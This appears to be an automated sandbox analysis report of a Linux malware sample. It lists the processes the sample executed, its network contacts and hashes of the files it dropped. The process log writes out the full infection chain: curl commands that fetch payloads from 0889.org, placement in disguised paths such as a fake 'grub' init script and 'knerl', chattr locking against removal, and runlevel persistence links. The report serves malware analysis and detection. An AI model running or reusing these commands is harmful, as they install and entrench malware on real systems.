/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]
/bin/ln
[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]
/bin/chmod
[chmod +x /usr/local/sbin/mcron]
/usr/bin/chattr
[chattr +ia /usr/local/sbin/mcron]
/usr/bin/dirname
[dirname /usr/bin/bsd-port/knerl]
/bin/mkdir
[mkdir -p /usr/bin/bsd-port]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/10000 -o /usr/bin/bsd-port/knerl]
/bin/chmod
[chmod +x /usr/bin/bsd-port/knerl]
/usr/bin/chattr
[chattr +ia /usr/bin/bsd-port/knerl]
/usr/bin/curl
[curl -fsSL http://0889.org/aegis/grub -o /etc/init.d/grub]
/bin/chmod
[chmod +x /etc/init.d/grub]
/usr/bin/chattr
[chattr +ia /etc/init.d/grub]
/usr/local/sbin/mcron
[/usr/local/sbin/mcron]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | 0889.org | udp |
| GB | 51.143.179.104:80 | 0889.org | tcp |
| US | 1.1.1.1:53 | 0889.org | udp |
| GB | 51.143.179.104:80 | 0889.org | tcp |
| US | 1.1.1.1:53 | 0889.org | udp |
| GB | 51.143.179.104:80 | 0889.org | tcp |
Files
/etc/sedwfmGpN
| MD5 | 8f111d100ea459f68d333d63a8ef2205 |
| SHA1 | 077ca9c46a964de67c0f7765745d5c6f9e2065c3 |
| SHA256 | 0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354 |
| SHA512 | d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb |
/etc/init.d/sedTtUAO1
| MD5 | 9b392bac8c24330ad47478a5038ead13 |
| SHA1 | 6c3050598d168c42dc688cecb77fe478211c3ab9 |
| SHA256 | d054fee005a1aa4363200512769a6aef7aad68fc4c9947b8f8c417615727f07f |
| SHA512 | 2a4da94b1f58ce1e3dab46a9e32417da710d9049028858cca0a0003305c38658f9bbe0b06ec04cdea26cab02fbd0a9fe44f36e277c087bdbf66763e6bc0f7462 |
/etc/init.d/sedm74Teg
| MD5 | ce2de503acc3de02f544571e89d4d717 |
| SHA1 | 5d767b14666d82389475868f153a38594acce7ae |
| SHA256 | 52da7743f31954a5fbe1c312dd4112a671fec9efaa1f9812926a8d97543ba0e2 |
| SHA512 | 2a0cd9e9cbfa7f5d6a4bfa66eef9200ab5fb12ea645496135a42afa5d2ccd5fb4ae36d306138f1ef2094a512f347bdcdd4780fbd19ade74156c9cd9dfea55440 |
/etc/init.d/sedmnWxVv
| MD5 | 03975a59225fad7d7c28e133de85d249 |
| SHA1 | 6f72b3b528550f16a2109bc9d86004180d7d734f |
| SHA256 | 42be3e66d014a04eb1cbccd57b3a4ef2c92b268798e2322ec87582271b9fed65 |
| SHA512 | e5b4028bd0ad53b76328f5f124ca9e88b1fc42b3617004a06c0954843a4586fb972763008bb96bd681003e5869952fc2678b65e7e5a5892f95efc618633f006e |
/etc/init.d/sedDJH83P
| MD5 | 510488b5120b580b673a15b75a5498b0 |
| SHA1 | 0f667545ae788ae46ccc7045dc7975f044a76fd2 |
| SHA256 | a4fecda40d06d41cab9892b8c2832d3f41d333d944a91a9bc7334540d1cada26 |
| SHA512 | 3fdcaea110abc6d7be70f52341ff7f523de70afa571ccdc88cdf6e1fab264cae2f70fa2cd8be0ccaa9de0cae2db9baa6139fb951f78e50a78a7ac1d7afb06821 |
/etc/init.d/sed2doE35
| MD5 | 85d7a3783889ea93dcda2fb488420c1c |
| SHA1 | 8edf95b211ad7e8df3ee2a331c4e658e9b746e5c |
| SHA256 | 2df15277374dedbff7fb792f22e42a72c75fbfc73414ccc87e07f49d377ad9d0 |
| SHA512 | 9abf28183e952b372423ec48c3b20cd218cfd76b50138ced0dd1969f7be66e0697cbcaee28d71984c46369ea14f9a62a8061ee992ddc2ca2b186c87b689dc3e9 |
/etc/init.d/sedcFdtji
| MD5 | ec9a7d183ec50837a12aca3f9c95cc27 |
| SHA1 | 396a23fa1d6e8a871d69786d14fd1ce4e4cba583 |
| SHA256 | c82a6b52fad02e7f7e33184a9b917fe966b20eb6afce27fb3b8c6e799f8df8a0 |
| SHA512 | ec1f384a5bc7e2a67b99838644346ea1391b5b75e7bcc1a1ea6d59f07418da7553175c8f43869ff352c0b7aa80cb26ccdc5f42c3dde9029917cebc520a19e85b |
/etc/init.d/sedpQr9ow
| MD5 | 0eb380bbeb5db57a59e298a074f1f9f3 |
| SHA1 | 284b88849b3dfd7f6c02c0d05c77a01292c8a679 |
| SHA256 | f1f205d18385e658de4d572d6df84a6ca125895fac42206443bc2b1118b2a6a2 |
| SHA512 | 428edfbdafa0ee634482ec597ce24cc96f92fcc308016bf3e4bf393711ae028a55c2d656bbfbaddec945a4ba7de17401dba2e432ed7593cbdab97e9de61b4e88 |
/etc/init.d/sedUWKnOM
| MD5 | 1ca5c0743fa797ffa364db95bb8d8d8e |
| SHA1 | 6de496930dfe00e705fa244d77e7dfa2d1c6aef8 |
| SHA256 | a919f9434b681974a2f1d4120af10c0527b30e8cda6fdec1dea1eee3077b6609 |
| SHA512 | 044c6136b2085066e71f15a942b341c54fcfe97f754a10d6e91971c150214e9be014cb96e83d8ae4dee51129f5b44a41c663598f9430e9c4cc93f5675b625b5f |
/etc/init.d/sed7blsk4
| MD5 | b868200c6e36ef87e27ead9a3ddad2db |
| SHA1 | b1cc85e63d4302b020a4679971b6c363c9392d63 |
| SHA256 | 5895801d6256ce6c2a65760e01db8ffd8b90a9bf80294e9a358423b3d4ce59d1 |
| SHA512 | f3dba21b0bb340c4742e5facd042180d66541010cc25f00e223cf545a78550184571951f5ac6c7c35a3840d08a6a07f89e78316c9f7cb65108c0558c3a5e9d0a |
/etc/init.d/sedecL8Uf
| MD5 | 82698019c962069b438bd2a82d9fa1e7 |
| SHA1 | 2ad758cc8614f4c8368e8e7eb71b92f0ff2e8305 |
| SHA256 | 65044cf080c0edd9bd6ba75e1a8e8d0f300930d590257c6d6ce28273899ad4a7 |
| SHA512 | dd64cd1f33f2cf09867363234e6791a3ebc3697aaef0d659e8e354c52fa9c4fc1c013369b28a42a831552eb888e2635e9a5d77c6619691af097c9fd2e4f0e9a9 |
/etc/init.d/sedUppmtj
| MD5 | 27013efdfe13470845c70a9e00a61fde |
| SHA1 | 2b840ac1a1d1b866ba457bd0746144c431e944ad |
| SHA256 | c02921f45d52f6e5f324cc2cdd3cb9a00198a5b5e979cc501b16eec6a786e7f0 |
| SHA512 | 0fd9e4da5dc1702970cc7b05fff801784ddeebb772f0f3b49b2e034a4927eabef1d5864345687d16388a1d59b71e7b4628978dcbdf113577413130a73d181b1d |
/etc/init.d/sedlZSDfw
| MD5 | 49fbfd237be2a2f09576f1f9374580be |
| SHA1 | e380716a856a90f5643ddd6f3655020fc2f603dd |
| SHA256 | 69219f70b7b70dacbce2f4a0fd9b2f7ac05623a285ae7abf1e798fdb72fac02e |
| SHA512 | b6f37481d2397b79fa47e23435626166c9857a78d19b755703e867b7401fa066122d898b4d303c6629d154bd1ed19f486146878ff5fafbe1e020e821c4835cea |
/etc/init.d/sed0t4SpK
| MD5 | 08213cf202f2552298f62a007487e01c |
| SHA1 | 1f143ee220797f30367d4de9e65ad9ac52fd8ea4 |
| SHA256 | 0f910b4518e553ac6b77c2942ee0ce753c96189550ee2b501293f7cc936edb5e |
| SHA512 | b3fb6f52c1345aec9d70fa60f8e3f69ad999307f1502cf80c2baac332c9ce6a5ec17c4e5b5759d47a5debb9f3ba913b188611a93bd82946538ed5a019d157c33 |
/etc/init.d/sedFiM310
| MD5 | 019ab1c1cb24b368b0965898746bb122 |
| SHA1 | 8146b37003a86a1348c6b165b32a247ce6907525 |
| SHA256 | deb397fc57b4e2a03e97e5a85889fba9af60aea6021ad1f0030149a81ea31818 |
| SHA512 | 9366e73bef488b09122ef763b942d258107464ecf6e5f32d70de0514fc3dc9baffb7e60b69bdf45b733f7521ed7b705989b7ac778089cf3958ef2eefe05f738a |
/etc/init.d/sedaOm0nf
| MD5 | 338975eb635877703fc066e005f916d9 |
| SHA1 | 5474296634bf9e527a9a865b0cb182e61a2b66bf |
| SHA256 | 89473464fed0e27fe2540620198293adbedac0c6a309dbca7a4bcf99996526f7 |
| SHA512 | 8ef00dc8893b2c7e3a988e4ffd5b60006591c424bb97c0cfbfe44cf76e94f742fcc7263e86b6608893c0e5cc9d04d28f2404a928a3a87bfb313a3caa4be808c8 |
/etc/init.d/sedmurBwi
| MD5 | 69497d0565055f626ee2bc84f818ce0f |
| SHA1 | b5ca73e0fef84a5aa8f0155f160952c4385045b8 |
| SHA256 | 5416ce07a0caf57f145d8f4f07e036d2decd72023e649f782d30be599ddf20da |
| SHA512 | 23d14d2c9f3356242a56f2716bd79d31f6c8a936c7a581d4b472ca126113a6b589f4ceb37816178b17ca09f508f196009ffcb390d349302a54dee0644f995bec |
/etc/init.d/sedlS4UXu
| MD5 | e4da2ae5c153148fad0b3f6e5e7ce61e |
| SHA1 | 3ef89c60b9f66bad7834dc5621772d474e3e36d9 |
| SHA256 | 373a932050d1fd4912c80fff5b941e49d37bf9899d156b524c6404f1c76e3923 |
| SHA512 | dff5193df49f6e639d76f38d0a45cd68efec5e6d4ee06801d732cdb1e3ca7057820be046fba05e13d07d934f248773df246760b6288b9753abe067f268d7cc10 |
/etc/init.d/sed894o2H
| MD5 | 4bf46072f9f13b2e38d58a053def37d5 |
| SHA1 | 94e4b56f7a5d40a40f256a474e244642ad778a4e |
| SHA256 | a6ef18d6a1b3f33cb3df0dce41759bda88e3133d249e6c13848fb0a007654cbf |
| SHA512 | 0ffe565c26cf1585a0d26f47328fca2d886fc33b43537f4674d0f13d6eee3f39775fa0115e8b3606148665807540244e517d7c10130c161e7191172a76a031de |
/tmp/sh-thd.9HUJKD
| MD5 | 2ff9930962f5ed39a68bfabddc3551ac |
| SHA1 | 9f99fbefee4a609f403025ed510c2fa93982303b |
| SHA256 | d00546c6e26a2f1e7c7ae24a5173fb58b3d7e060d4920b7a7ba772bc76e956f7 |
| SHA512 | 6b6cd3c027e2b1b3b19519a413b96f15d4dc5579f30b61919e1ab7f2e1273141dec54d8b21cf49a8b89815d3cd9694354788a13ec651e0479eb70a53f576d1df |
/etc/init.d/crontabs
| MD5 | f21f5717d956b60f695d350bbab05716 |
| SHA1 | 1155f2cf27dc56f0e981ab78517dbf6d1b45d72f |
| SHA256 | c19b0543ff2a66484d54268c27defcd2a8d5b9ac26e267c73dace034ac21931e |
| SHA512 | 2bdf31983a48991dc7de0c2d25cb97a032fc6fd29fe1534536b9e910504a6d1317d83c935ad92bab979065da81f4f2c6218b7d2f5df31ffcc8190952a49e9ba2 |
/usr/local/sbin/mcron
| MD5 | 7cd0552f2eb740d23790d82134d0adb8 |
| SHA1 | c600bdcf3ba70156856b6712070a3c65368e2e62 |
| SHA256 | 62b44a654916d6e52af20897cbcf39e4134b4c79d2498fbbc08987cc392b5788 |
| SHA512 | 43309fdf0e4c2a1a7503488bd0493ebd1cb66cecf2fdf19dd76be9848a80be1478fcc0662c382ad8230ecf4963d89b8c1d58c33670db8777d136ae089517e9a7 |
/usr/bin/bsd-port/knerl
| MD5 | 8a51a05df6f69f2a6fc4c4e376b65f70 |
| SHA1 | 1b68e2894d97363dcd9f2d7e42724dfc58e0a260 |
| SHA256 | 7f048a07a9c6166054ae0a1fe9af0c38769ff6fc5189ada4e4144c71e5d24994 |
| SHA512 | 505595aeeae9018dc0d31e158899d620ef4fe1d9d8e510ee10a82aec889202e4994a3e387f628033a90aa53d633c1e7c7865a98cfdfb147ecc950b3c1376a37d |
/etc/init.d/grub
| MD5 | 81bb3911dc14f3eb53d0700a4aa50475 |
| SHA1 | 89531a3a74e100f51118a6c12d7a4e8d346eeac4 |
| SHA256 | 8027b789feb011489894fbac26a9d3e4ecc60972d85c5df7438c3dc390fc1962 |
| SHA512 | 632e4fc0d9be24c69faa8fd0e702f25a6530698908401cc868d2c294c83703b99c1378196b1b4456bc6e1d1bf364960e18427e92509d6c5bb94b4cb4d7e78995 |